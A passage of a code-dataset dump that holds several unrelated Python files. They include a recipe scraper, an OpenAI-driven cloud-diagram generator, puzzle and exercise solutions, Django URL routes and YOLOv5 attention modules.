deniedList[i] in div.text:\r\n check = True\r\n i += 1\r\n\r\n if not check:\r\n for d in div.find_all('title'):\r\n title.append(d.text)\r\n for d in div.find_all('cat'):\r\n cat.append(d.text)\r\n for d in div.find_all('ing'):\r\n ing.append(d.text)\r\n for d in div.find_all('prep'):\r\n prep.append(d.text)\r\n for d in div.find_all('eng'):\r\n eng.append(d.text)\r\n for d in div.find_all('inf'):\r\n inf.append(d.text)\r\n return title, cat, ing, prep, eng, inf\r\n\r\n\r\n def updateCorpus(self, url):\r\n\r\n from urllib.request import urlopen\r\n from urllib.parse import quote\r\n import re\r\n from string import punctuation\r\n\r\n page = urlopen(url).read().decode('utf-8')\r\n soup = BeautifulSoup(page,'html.parser')\r\n\r\n lastIdToSave = open('corpusFr/lastIdToSave.txt', 'r')\r\n lastID = lastIdToSave.read()\r\n lastIdToSave.close()\r\n\r\n newCorpus = open('corpusFr/newCorpus.txt', 'a')\r\n\r\n urls, i = [], int(lastID)+1\r\n for a in soup.find_all('a', attrs={\"class\", \"recipe-card\"}):\r\n urls.append(str('http://www.marmiton.org'+a['href']))\r\n print(urls)\r\n for url in urls[:5]:\r\n page = urlopen(url).read().decode('utf-8')\r\n soup = BeautifulSoup(page,'html.parser')\r\n\r\n titles = [ title.text for title in soup.find_all(\"h1\", attrs={\"class\" : \"main-title\"}) ]\r\n\r\n ingredients = [ qt.text+ing.text for (qt,ing) in zip(soup.find_all(\"span\", attrs={\"class\" : \"recipe-ingredient-qt\"}), soup.find_all(\"span\", attrs={\"class\" : \"ingredient\"})) ]\r\n\r\n preparations = [ prep.text.split('\\t\\t\\t')[1].split('.')[0] for prep in soup.find_all(\"li\", attrs={\"class\" : \"recipe-preparation__list__item\"}) ]\r\n preparations = re.sub('\\t', ' ', '. '.join(preparations))\r\n\r\n timePrep = \"\"\r\n for divpTime in soup.find_all(\"div\", attrs={\"class\" : \"recipe-infos__timmings__preparation\"}):\r\n for pTime in divpTime.find_all(\"span\", attrs={\"class\" : \"recipe-infos__timmings__value\"}):\r\n timePrep = pTime.text.strip() \r\n\r\n cookPrep = \"\"\r\n for divpTime in soup.find_all(\"div\", attrs={\"class\" : \"recipe-infos__timmings__cooking\"}):\r\n for pTime in divpTime.find_all(\"span\", attrs={\"class\" : \"recipe-infos__timmings__value\"}):\r\n cookPrep = pTime.text.strip()\r\n\r\n info = \"Auteur : www.marmiton.org \\nNiveau : \\nPréparation : \"+timePrep+\" \\nCuisson :\"+cookPrep+\"\"\r\n\r\n categories = []\r\n for tagsCat in soup.find_all(\"ul\", attrs={\"class\" : \"mrtn-tags-list\"}):\r\n for tag in tagsCat.find_all(\"li\", attrs={\"class\" : \"mrtn-tag\"}):\r\n categories.append(tag.text)\r\n\r\n #Remove punctuation\r\n titles = [''+''.join(c for c in s if c not in punctuation)+'' for s in titles]\r\n categories = [''+''.join(c for c in s if c not in punctuation)+'' for s in categories]\r\n ingredients = [''+''.join(c for c in s if c not in punctuation)+'' for s in ingredients]\r\n preparations = ''+preparations+''\r\n calories = '0'\r\n\r\n #Convert to String\r\n strTitles = \"\\n\".join(titles)\r\n strTitles = \" \".join(strTitles.split())\r\n strCategories = \"\\n\".join(categories)\r\n strCategories = \" \".join(strCategories.split())\r\n strIngredients = \"\\n\".join(ingredients)\r\n\r\n #String to write in my Corpus\r\n toWrite = '\\n'+strTitles+'\\n'+info+'\\n'+strCategories+'\\n'+strIngredients+'\\n'+preparations+'\\n'+calories+'\\n\\n'\r\n newCorpus.write(toWrite)\r\n\r\n i += 1\r\n lastIdToSave = open('corpusFr/lastIdToSave.txt', 'w')\r\n lastIdToSave.write(str(i-1))\r\n lastIdToSave.close()\r\n\r\nif __name__ == \"__main__\":\r\n searchObj = Search([], 'corpus/arCorpus.txt', 2)\r\n words = ['ﺔﻧﻭﺮﻜﻌﻤﻟا' ,'ﺎﺑﺎﻄﺒﻟا' ,'ﻞﺼﺒﻟا' ,'ﻞﻔﻠﻔﻟا']\r\n stemmed = searchObj.getStemmedText(words)\r\n query = [\"ﻖﺘﺴﻔﻟاﻭ\" ,\"ﺓﺕﻻﻮﻛﻮﺷﻝا\" ,\"ﻉﺏﺎﺻا\"]\r\n keyWords = searchObj.getKeyWords(query)\r\n print(keyWords)\r\n","repo_name":"saidziani/AssistantChef","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":16701,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"31"} +{"seq_id":"71428510167","text":"from diagrams import Cluster, Diagram, Edge\nfrom diagrams.aws.compute import EC2, ECS, EKS, Lambda\nfrom diagrams.aws.database import RDS, ElastiCache, Redshift\nfrom diagrams.aws.integration import SQS\nfrom diagrams.aws.network import VPC, ELB, Route53\nfrom diagrams.aws.storage import S3\nimport random\nimport json\nimport openai\n\n# from dotenv import load_dotenv\n# import os\n\n# load_dotenv()\n# openai.api_key = os.getenv(\"OPENAPI_KEY\")\n\n\nclass ER_GPT:\n def __init__(self):\n self.temperature = 0\n pass\n\n # Step 1, get the architecture components\n def step_1(self, user_input):\n it_prompt = \"I want you to act as an IT Cloud Architect with an experience in reference diagrams that can help introduce new tools.\"\n assistant_prompt = \"Include cloud services, SAP App Server, and Database as nodes. Include Private subnet, Virtual Private Cloud as a containers.\"\n # user_input = \"Build an SAP architecture on AWS with multi-cloud deployment for redundancy and vendor flexibility.\"\n\n completion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo-0613\",\n messages=[\n {\"role\": \"system\", \"content\": it_prompt},\n {\"role\": \"user\", \"content\": assistant_prompt},\n {\"role\": \"user\", \"content\": user_input},\n ],\n functions=[\n {\n \"name\": \"get_architecture_components\",\n \"description\": \"Get the cloud architecture components split into containers (categorization) and nodes or application services\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"containers\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"string\",\n \"description\": \"Region or VPC or private subnet\",\n },\n \"description\": \"Top-layer category of nodes such as region / VPC / private subnet, but not the nodes themselves\",\n },\n \"nodes\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"string\",\n \"description\": \"Database or application.\",\n },\n \"description\": \"Application nodes or cloud service. If duplicated in multiple containers, include as that many nodes.\",\n },\n },\n \"required\": [\"nodes\"],\n },\n }\n ],\n function_call={\"name\": \"get_architecture_components\"},\n temperature=self.temperature,\n )\n architecture_result = completion.choices[0].message.function_call.arguments\n print(architecture_result)\n return architecture_result\n\n # Step 2, get the step by step diagram\n def step_2(self, architecture_result):\n diagram_system_prompt = \"Act as a teacher for creating an instruction for drawing an entity diagram based on the cloud software architectural decision. Use nodes for rectangles and clusters for containers.\"\n diagram_assistant_prompt = \"Nodes stay inside of containers. Nodes connect to other nodes. Containers cannot connect to other containers.\"\n diagram_input = (\n architecture_result\n + \"\\nBased on the components of this cloud architecture, create an instruction for drawing an accurate entity diagram.\"\n )\n\n completion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo-0613\",\n messages=[\n {\"role\": \"system\", \"content\": diagram_system_prompt},\n {\"role\": \"assistant\", \"content\": diagram_assistant_prompt},\n {\"role\": \"user\", \"content\": diagram_input},\n ],\n functions=[\n {\n \"name\": \"get_diagram_instruction\",\n \"description\": \"Get the instruction for drawing an entity diagram based on the cloud software architectural decision\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"instructions\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"string\",\n \"description\": \"Current step for drawing an entity diagram\",\n },\n \"description\": \"Instruction for drawing an entity diagram\",\n }\n },\n },\n \"required\": [\"instructions\"],\n }\n ],\n function_call={\"name\": \"get_diagram_instruction\"},\n temperature=self.temperature,\n )\n diagram_result = completion.choices[0].message.function_call.arguments\n print(diagram_result)\n return diagram_result\n\n # Step 3, get the code\n def step_3(self, diagram_result):\n code_imports = \"Cluster, Diagram, Edge, EC2, ECS, EKS, Lambda, RDS, ElastiCache, Redshift, SQS, ELB, Route53, S3\"\n example_code = 'with Diagram(\"diagram\", show=False):\\n with Cluster(\"ReplicaSet\"): \\n pods = [Pod(\"pod{}\".format(i)) for i in range(1, 3)]\\n rs = ReplicaSet(\"rs\")\\n rs - pods\\n dp = Deployment(\"dp\")\\n dp << rs\\n hpa = HPA(\"hpa\")\\n dp << hpa\\n net >> rs << dp'\n code_import = \"\"\"from diagrams.aws.compute import EC2, ECS, EKS, Lambda\\n\n from diagrams.aws.database import RDS, ElastiCache, Redshift\n from diagrams.aws.integration import SQS\n from diagrams.aws.network import VPC, ELB, Route53\n from diagrams.aws.storage import S3\"\"\"\n # from diagrams import Cluster, Diagram, Edge\n code_system_prompt = f\"Act as a developer coding diagrams in Python. Containers are instantiated with With statement. Example code {example_code}. Replace containers with Cluster class. For nodes, use the following import: {code_import}.\"\n code_prompt = (\n diagram_result\n + \"\\nFollow the instruction step by step and write a python code that generates a diagram using diagrams library. Save the image as diagram and show=True. Don't label connections. Don't inlcude } at the end. Don't import anything.\"\n )\n\n completion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo-0613\",\n messages=[\n {\"role\": \"system\", \"content\": code_system_prompt},\n {\"role\": \"user\", \"content\": code_prompt},\n ],\n functions=[\n {\n \"name\": \"get_python_code_for_diagram\",\n \"description\": \"Get the python code for drawing an entity diagram without from diagrams import X. Do not draw lines from cluster to another cluster. It does not have any import statement.\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"code\": {\n \"type\": \"string\",\n }\n },\n },\n \"required\": [\"code\"],\n }\n ],\n function_call={\"name\": \"get_python_code_for_diagram\"},\n temperature=self.temperature,\n )\n code_result = completion.choices[0].message.function_call.arguments\n code_result = json.loads(code_result, strict=False)[\"code\"]\n code_result = self.remove_import_statements(self.replace_Node(code_result))\n\n print(code_result)\n self.run_code(code_result)\n return code_result\n\n # step 4 edit the diagram\n def step_4(self, user_edit_input, code_result):\n # user_edit_input = \"Include a non-SAP data outside of virtual private cloud.\"\n\n edit_system_prompt = (\n f\"Act as a senior developer and comment with #. Draw containers with Cluster(). Here is the original code: \"\n + code_result\n )\n edit_prompt = (\n user_edit_input\n + \"\\nNow edit the code to fix the diagram so that the user is sataisfied with the direction, cluster, node, or edges. If new application or service is mentioned, call the appropriate diagrams class. Make minimum changes and don't delete anything unless told to.\"\n )\n\n completion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo-0613\",\n messages=[\n {\"role\": \"system\", \"content\": edit_system_prompt},\n {\"role\": \"user\", \"content\": edit_prompt},\n ],\n functions=[\n {\n \"name\": \"get_python_code_for_diagram\",\n \"description\": \"Get the python code for drawing an entity diagram without from diagrams import X. Do not draw lines from container to another container.\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"code\": {\n \"type\": \"string\",\n }\n },\n },\n \"required\": [\"code\"],\n }\n ],\n function_call={\"name\": \"get_python_code_for_diagram\"},\n temperature=self.temperature,\n )\n edit_result = completion.choices[0].message.function_call.arguments\n edit_result = json.loads(edit_result, strict=False)[\"code\"]\n self.run_code(edit_result)\n return edit_result\n\n def run_code(self, code, done=False):\n while True:\n try:\n exec(code)\n break\n except OSError:\n with Diagram(\"diagram\", show=True):\n exec(code)\n except SyntaxError:\n if not done:\n self.run_code(code[:-2], done=True)\n break\n\n def remove_import_statements(self, import_string):\n lines = import_string.split(\"\\n\")\n filtered_lines = [line for line in lines if \"from\" and \"import\" not in line]\n return \"\\n\".join(filtered_lines)\n\n def replace_Node(self, code):\n all_nodes = [\n \"EC2\",\n \"ECS\",\n \"EKS\",\n \"Lambda\",\n \"RDS\",\n \"ElastiCache\",\n \"Redshift\",\n \"SQS\",\n \"ELB\",\n \"Route53\",\n \"S3\",\n ]\n return code.replace(\"Node\", random.choice(all_nodes))\n","repo_name":"KaiMJ/ER-GPT","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"982407417","text":"class Node:\n\n def __init__(self, bit_index, leaf_value):\n self.bit_index = bit_index\n self.count = 1\n \n self.one_count = 0\n self.one_node = None\n \n self.zero_count = 0\n self.zero_node = None\n \n self.leaf_value = None\n if bit_index >= len(leaf_value): # This is a terminal node. There are no more bits\n self.leaf_value = leaf_value\n return\n\n # Parse the remaining bits of the value\n child = Node(bit_index + 1, leaf_value)\n if leaf_value[bit_index] == '1':\n self.one_count += 1\n self.one_node = child\n else:\n self.zero_count += 1\n self.zero_node = child\n\n \n def __str__(self):\n if self.leaf_value:\n return \"Leaf node: \" + self.leaf_value\n else:\n return \"Inner node: \" + str(self.count) + \" children. \" + str(self.one_count) + \" ones, \" + str(self.zero_count) + \" zeros.\"\n\n def insert(self, line):\n self.count += 1\n if line[self.bit_index] == '1':\n self.one_count += 1\n if self.one_node is None:\n self.one_node = Node(self.bit_index + 1, line)\n else:\n self.one_node.insert(line)\n else:\n self.zero_count += 1\n if self.zero_node is None:\n self.zero_node = Node(self.bit_index + 1, line)\n else:\n self.zero_node.insert(line)\n \n def oxygen_generator_rating(self):\n if self.leaf_value:\n return ''\n if self.one_count >= self.zero_count:\n return '1' + self.one_node.oxygen_generator_rating()\n else:\n return '0' + self.zero_node.oxygen_generator_rating()\n\n def co2_scrubber_rating(self):\n if self.leaf_value:\n return ''\n if self.zero_count != 0 and self.zero_count <= self.one_count or self.one_count == 0:\n return '0' + self.zero_node.co2_scrubber_rating()\n else:\n return '1' + self.one_node.co2_scrubber_rating()\n\nroot = None\nwith open('input.txt') as input:\n for line in input.readlines():\n line = line.strip()\n if root == None:\n root = Node(0, line)\n else:\n root.insert(line)\nprint(\"Life support rating: \" + str(int(root.oxygen_generator_rating(), 2)*int(root.co2_scrubber_rating(), 2)))\n","repo_name":"kristy234/adventofcode","sub_path":"2021/3.2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9374072241","text":"from django.conf.urls import patterns, url\nfrom django.views.generic.detail import DetailView\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\n\nfrom .views import UserRegister, UserEdit, EventAdd, EventEdit, EventSearch, EventDelete, login_or_redirect, \\\n event_attend, user_follow\nfrom .models import Event\n\n# ##FOR TESTING ONLY###\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n# #####################\n\n\nurlpatterns = patterns('',\n url(r'^$', login_or_redirect, name=\"login\"),\n url(r'^logout/$', 'django.contrib.auth.views.logout_then_login', name=\"logout\"),\n url(r'^register/$', UserRegister.as_view(), name=\"register\"),\n url(r'^event/new$', login_required(EventAdd.as_view()), name=\"event-new\"),\n url(r'^event/delete/(?P\\d+)/$', EventDelete.as_view(), name=\"event-delete\"),\n url(r'^event/edit/(?P\\d+)/$', EventEdit.as_view(), name=\"event-edit\"),\n url(r'^event/(?P\\d+)/$', login_required(DetailView.as_view(model=Event,\n template_name='event/detail.html')),\n name=\"event-detail\"),\n url(r'^event/search$', login_required(EventSearch.as_view()), name=\"event-search\"),\n url(r'^user/(?P\\d+)/$', login_required(DetailView.as_view(model=User,\n template_name='website/profile.html')),\n name=\"user-profile\"),\n url(r'^event/attend/$', event_attend, name=\"event-attend\"),\n url(r'^user/follow/$', user_follow, name=\"user-follow\"),\n url(r'^user/edit/$', login_required(UserEdit.as_view()), name=\"user-edit\"),\n) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) # FOR TESTING ONLY\n\n","repo_name":"mmauricio11235/Event-Scape","sub_path":"website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12154730706","text":"# Given a sorted array and a target value, return the index if the target is found. \n# If not, return the index where it would be if it were inserted in order.\n\n# You may assume no duplicates in the array.\n\n# Example 1:\n# Input: [1,3,5,6], 5\n# Output: 2\n\n# Example 2:\n# Input: [1,3,5,6], 2\n# Output: 1\n\n# Example 3:\n# Input: [1,3,5,6], 7\n# Output: 4\n\n# Example 4:\n# Input: [1,3,5,6], 0\n# Output: 0\n\n# My Method:\n# 检查是否在list内,在的话返回索引;否则判断是否小于某个索引的数值大小,是的话则插入该数值前,索引即为该数值的索引;\n# 再检查如果大于最后一个数值了,即该数值不存在,而且list内的数值均小于它,则其索引为最后一个\nclass Solution:\n def searchInsert(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n if target in nums:\n return(nums.index(target))\n else:\n for i in range(len(nums)):\n if target < nums[i]:\n return i\n if target > nums[-1]:\n return len(nums)\n \n","repo_name":"IsWdZh/Leetcode","sub_path":"Python/Search-Insert-Position.py","file_name":"Search-Insert-Position.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29206740317","text":"CONST_INT_MAX = 105\n\nT = 10\n\nfor test_case in range(T):\n myQueue =[]\n myGraph = [[] for i in range(CONST_INT_MAX)]\n visited = [False for i in range(CONST_INT_MAX)]\n result = 0\n input_length, start = map(int, input().split())\n input_list = list(map(int, input().split()))\n for i in range(input_length//2):\n myGraph[input_list[i*2]].append(input_list[i*2+1])\n \n visited[start] = True\n myQueue.append(start)\n while myQueue:\n cur_length = len(myQueue)\n for i in range(cur_length):\n cur = myQueue.pop(0)\n if i == 0:\n result = cur\n else:\n if result < cur:\n result = cur\n for j in myGraph[cur]:\n if visited[j] == False:\n visited[j] = True\n myQueue.append(j)\n \n print(\"#{0} {1}\".format(test_case+1, result))\n ","repo_name":"humbleYoon/algorithm","sub_path":"SWEA/SWEA_contact.py","file_name":"SWEA_contact.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"25268096035","text":"# 8.57: Read weather_newyork.csv into a DataFrame. Use\n# .reindex() to select just the EST, Max TemperatureF and Min\n# TemperatureF columns (with all rows). Use .rename() to\n# rename these columns as 'date', 'max_temp' and 'min_temp'.\n# Now add an additional column 'diff_temp' showing the\n# difference between max and min. Sort the DataFrame by this\n# value, highest to lowest.\n\nimport pandas as pd\n\ndf = pd.read_csv('../weather_newyork.csv')\n\ndfs = df.reindex(['EST', 'Max TemperatureF', 'Min TemperatureF'], axis=1)\n\ndfs = dfs.rename(columns={ 'EST': 'date',\n 'Max TemperatureF': 'max_temp',\n 'Min TemperatureF': 'min_temp' })\n\n\n","repo_name":"rafaelmvargas/advanced-python","sub_path":"session_08_working_files/inclass_exercises/inclass_8.57.py","file_name":"inclass_8.57.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7558413702","text":"# YOLOv5 🚀 by Ultralytics, GPL-3.0 license\n\"\"\"\nCommon modules\n\"\"\"\n\nimport json\nimport math\nimport platform\nfrom re import S\nimport warnings\nfrom copy import copy\nfrom pathlib import Path\nfrom collections import OrderedDict\nimport cv2\nimport numpy as np\nimport pandas as pd\nimport requests\nimport torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\nfrom PIL import Image\nfrom torch.cuda import amp\nfrom torch.nn import Softmax\nfrom torch.nn import init\nfrom torch.nn.parameter import Parameter\nfrom torch.autograd import Function\n\nfrom utils.datasets import exif_transpose, letterbox\nfrom utils.general import (LOGGER, check_requirements, check_suffix, colorstr, increment_path, make_divisible,\n non_max_suppression, scale_coords, xywh2xyxy, xyxy2xywh)\nfrom utils.plots import Annotator, colors, save_one_box\nfrom utils.torch_utils import time_sync\n\n\n# === GAMAttention start === \n\n\nclass GAMAttention(nn.Module):\n #https://paperswithcode.com/paper/global-attention-mechanism-retain-information\n def __init__(self, c1, c2, group=True,rate=4):\n super(GAMAttention, self).__init__()\n \n self.channel_attention = nn.Sequential(\n nn.Linear(c1, int(c1 / rate)),\n nn.ReLU(inplace=True),\n nn.Linear(int(c1 / rate), c1)\n )\n self.spatial_attention = nn.Sequential(\n nn.Conv2d(c1, c1//rate, kernel_size=7, padding=3,groups=rate)if group else nn.Conv2d(c1, int(c1 / rate), kernel_size=7, padding=3), \n nn.BatchNorm2d(int(c1 /rate)),\n nn.ReLU(inplace=True),\n nn.Conv2d(c1//rate, c2, kernel_size=7, padding=3,groups=rate) if group else nn.Conv2d(int(c1 / rate), c2, kernel_size=7, padding=3), \n nn.BatchNorm2d(c2)\n )\n\n def forward(self, x):\n b, c, h, w = x.shape\n x_permute = x.permute(0, 2, 3, 1).view(b, -1, c)\n x_att_permute = self.channel_attention(x_permute).view(b, h, w, c)\n x_channel_att = x_att_permute.permute(0, 3, 1, 2)\n x = x * x_channel_att\n \n x_spatial_att = self.spatial_attention(x).sigmoid()\n x_spatial_att=channel_shuffle(x_spatial_att,4) #last shuffle \n out = x * x_spatial_att\n return out \n\ndef channel_shuffle(x, groups=2): ##shuffle channel \n #RESHAPE----->transpose------->Flatten \n B, C, H, W = x.size()\n out = x.view(B, groups, C // groups, H, W).permute(0, 2, 1, 3, 4).contiguous()\n out=out.view(B, C, H, W) \n return out\n\n\n# === GAMAttention end ===\n\n# === SEAttention start === \n\n# https://arxiv.org/abs/1709.01507\nclass SEAttention(nn.Module):\n\n def __init__(self, channel=512,reduction=16):\n super().__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Sequential(\n nn.Linear(channel, channel // reduction, bias=False),\n nn.ReLU(inplace=True),\n nn.Linear(channel // reduction, channel, bias=False),\n nn.Sigmoid()\n )\n\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n init.kaiming_normal_(m.weight, mode='fan_out')\n if m.bias is not None:\n init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.constant_(m.weight, 1)\n init.constant_(m.bias, 0)\n elif isinstance(m, nn.Linear):\n init.normal_(m.weight, std=0.001)\n if m.bias is not None:\n init.constant_(m.bias, 0)\n\n def forward(self, x):\n b, c, _, _ = x.size()\n y = self.avg_pool(x).view(b, c)\n y = self.fc(y).view(b, c, 1, 1)\n return x * y.expand_as(x)\n\n# === SEAttention end ===\n\n\n# === SOCA start ===\n\nclass Covpool(Function):\n @staticmethod\n def forward(ctx, input):\n x = input\n batchSize = x.data.shape[0]\n dim = x.data.shape[1]\n h = x.data.shape[2]\n w = x.data.shape[3]\n M = h*w\n x = x.reshape(batchSize,dim,M)\n I_hat = (-1./M/M)*torch.ones(M,M,device = x.device) + (1./M)*torch.eye(M,M,device = x.device)\n I_hat = I_hat.view(1,M,M).repeat(batchSize,1,1).type(x.dtype)\n y = x.bmm(I_hat).bmm(x.transpose(1,2))\n ctx.save_for_backward(input,I_hat)\n return y\n @staticmethod\n def backward(ctx, grad_output):\n input,I_hat = ctx.saved_tensors\n x = input\n batchSize = x.data.shape[0]\n dim = x.data.shape[1]\n h = x.data.shape[2]\n w = x.data.shape[3]\n M = h*w\n x = x.reshape(batchSize,dim,M)\n grad_input = grad_output + grad_output.transpose(1,2)\n grad_input = grad_input.bmm(x).bmm(I_hat)\n grad_input = grad_input.reshape(batchSize,dim,h,w)\n return grad_input\n\nclass Sqrtm(Function):\n @staticmethod\n def forward(ctx, input, iterN):\n x = input\n batchSize = x.data.shape[0]\n dim = x.data.shape[1]\n dtype = x.dtype\n I3 = 3.0*torch.eye(dim,dim,device = x.device).view(1, dim, dim).repeat(batchSize,1,1).type(dtype)\n normA = (1.0/3.0)*x.mul(I3).sum(dim=1).sum(dim=1)\n A = x.div(normA.view(batchSize,1,1).expand_as(x))\n Y = torch.zeros(batchSize, iterN, dim, dim, requires_grad = False, device = x.device)\n Z = torch.eye(dim,dim,device = x.device).view(1,dim,dim).repeat(batchSize,iterN,1,1)\n if iterN < 2:\n ZY = 0.5*(I3 - A)\n Y[:,0,:,:] = A.bmm(ZY)\n else:\n ZY = 0.5*(I3 - A)\n Y[:,0,:,:] = A.bmm(ZY)\n Z[:,0,:,:] = ZY\n for i in range(1, iterN-1):\n ZY = 0.5*(I3 - Z[:,i-1,:,:].bmm(Y[:,i-1,:,:]))\n Y[:,i,:,:] = Y[:,i-1,:,:].bmm(ZY)\n Z[:,i,:,:] = ZY.bmm(Z[:,i-1,:,:])\n ZY = 0.5*Y[:,iterN-2,:,:].bmm(I3 - Z[:,iterN-2,:,:].bmm(Y[:,iterN-2,:,:]))\n y = ZY*torch.sqrt(normA).view(batchSize, 1, 1).expand_as(x)\n ctx.save_for_backward(input, A, ZY, normA, Y, Z)\n ctx.iterN = iterN\n return y\n @staticmethod\n def backward(ctx, grad_output):\n input, A, ZY, normA, Y, Z = ctx.saved_tensors\n iterN = ctx.iterN\n x = input\n batchSize = x.data.shape[0]\n dim = x.data.shape[1]\n dtype = x.dtype\n der_postCom = grad_output*torch.sqrt(normA).view(batchSize, 1, 1).expand_as(x)\n der_postComAux = (grad_output*ZY).sum(dim=1).sum(dim=1).div(2*torch.sqrt(normA))\n I3 = 3.0*torch.eye(dim,dim,device = x.device).view(1, dim, dim).repeat(batchSize,1,1).type(dtype)\n if iterN < 2:\n der_NSiter = 0.5*(der_postCom.bmm(I3 - A) - A.bmm(der_sacleTrace))\n else:\n dldY = 0.5*(der_postCom.bmm(I3 - Y[:,iterN-2,:,:].bmm(Z[:,iterN-2,:,:])) -\n Z[:,iterN-2,:,:].bmm(Y[:,iterN-2,:,:]).bmm(der_postCom))\n dldZ = -0.5*Y[:,iterN-2,:,:].bmm(der_postCom).bmm(Y[:,iterN-2,:,:])\n for i in range(iterN-3, -1, -1):\n YZ = I3 - Y[:,i,:,:].bmm(Z[:,i,:,:])\n ZY = Z[:,i,:,:].bmm(Y[:,i,:,:])\n dldY_ = 0.5*(dldY.bmm(YZ) - \n Z[:,i,:,:].bmm(dldZ).bmm(Z[:,i,:,:]) - \n ZY.bmm(dldY))\n dldZ_ = 0.5*(YZ.bmm(dldZ) - \n Y[:,i,:,:].bmm(dldY).bmm(Y[:,i,:,:]) -\n dldZ.bmm(ZY))\n dldY = dldY_\n dldZ = dldZ_\n der_NSiter = 0.5*(dldY.bmm(I3 - A) - dldZ - A.bmm(dldY))\n grad_input = der_NSiter.div(normA.view(batchSize,1,1).expand_as(x))\n grad_aux = der_NSiter.mul(x).sum(dim=1).sum(dim=1)\n for i in range(batchSize):\n grad_input[i,:,:] += (der_postComAux[i] \\\n - grad_aux[i] / (normA[i] * normA[i])) \\\n *torch.ones(dim,device = x.device).diag()\n return grad_input, None\n\ndef CovpoolLayer(var):\n return Covpool.apply(var)\n\ndef SqrtmLayer(var, iterN):\n return Sqrtm.apply(var, iterN)\n\nclass SOCA(nn.Module):\n # second-order Channel attention\n def __init__(self, channel, reduction=8):\n super(SOCA, self).__init__()\n self.max_pool = nn.MaxPool2d(kernel_size=2)\n\n self.conv_du = nn.Sequential(\n nn.Conv2d(channel, channel // reduction, 1, padding=0, bias=True),\n nn.ReLU(inplace=True),\n nn.Conv2d(channel // reduction, channel, 1, padding=0, bias=True),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n batch_size, C, h, w = x.shape # x: NxCxHxW\n N = int(h * w)\n min_h = min(h, w)\n h1 = 1000\n w1 = 1000\n if h < h1 and w < w1:\n x_sub = x\n elif h < h1 and w > w1:\n W = (w - w1) // 2\n x_sub = x[:, :, :, W:(W + w1)]\n elif w < w1 and h > h1:\n H = (h - h1) // 2\n x_sub = x[:, :, H:H + h1, :]\n else:\n H = (h - h1) // 2\n W = (w - w1) // 2\n x_sub = x[:, :, H:(H + h1), W:(W + w1)]\n cov_mat = CovpoolLayer(x_sub) # Global Covariance pooling layer\n cov_mat_sqrt = SqrtmLayer(cov_mat,5) # Matrix square root layer( including pre-norm,Newton-Schulz iter. and post-com. with 5 iteration)\n cov_mat_sum = torch.mean(cov_mat_sqrt,1)\n cov_mat_sum = cov_mat_sum.view(batch_size,C,1,1)\n y_cov = self.conv_du(cov_mat_sum)\n return y_cov*x\n\n# === SOCA end ===\n\n# === NAMA Attention start===\n\nclass Channel_Att(nn.Module):\n def __init__(self, channels, t=16):\n super(Channel_Att, self).__init__()\n self.channels = channels\n \n self.bn2 = nn.BatchNorm2d(self.channels, affine=True)\n\n\n def forward(self, x):\n residual = x\n\n x = self.bn2(x)\n weight_bn = self.bn2.weight.data.abs() / torch.sum(self.bn2.weight.data.abs())\n x = x.permute(0, 2, 3, 1).contiguous()\n x = torch.mul(weight_bn, x)\n x = x.permute(0, 3, 1, 2).contiguous()\n \n x = torch.sigmoid(x) * residual #\n \n return x\n\n\nclass NAMAttention(nn.Module):\n def __init__(self, channels, out_channels=None, no_spatial=True):\n super(NAMAttention, self).__init__()\n self.Channel_Att = Channel_Att(channels)\n \n def forward(self, x):\n x_out1=self.Channel_Att(x)\n \n return x_out1 \n\n# === NAMA Attention end ===\n\n# === CBAM start ===\nclass ChannelAttentionModule(nn.Module):\n def __init__(self, c1, reduction=16):\n super(ChannelAttentionModule, self).__init__()\n mid_channel = c1 // reduction\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n\n self.shared_MLP = nn.Sequential(\n nn.Linear(in_features=c1, out_features=mid_channel),\n nn.LeakyReLU(0.1, inplace=True),\n nn.Linear(in_features=mid_channel, out_features=c1)\n )\n self.act = nn.Sigmoid()\n #self.act=nn.SiLU()\n def forward(self, x):\n avgout = self.shared_MLP(self.avg_pool(x).view(x.size(0),-1)).unsqueeze(2).unsqueeze(3)\n maxout = self.shared_MLP(self.max_pool(x).view(x.size(0),-1)).unsqueeze(2).unsqueeze(3)\n return self.act(avgout + maxout)\n 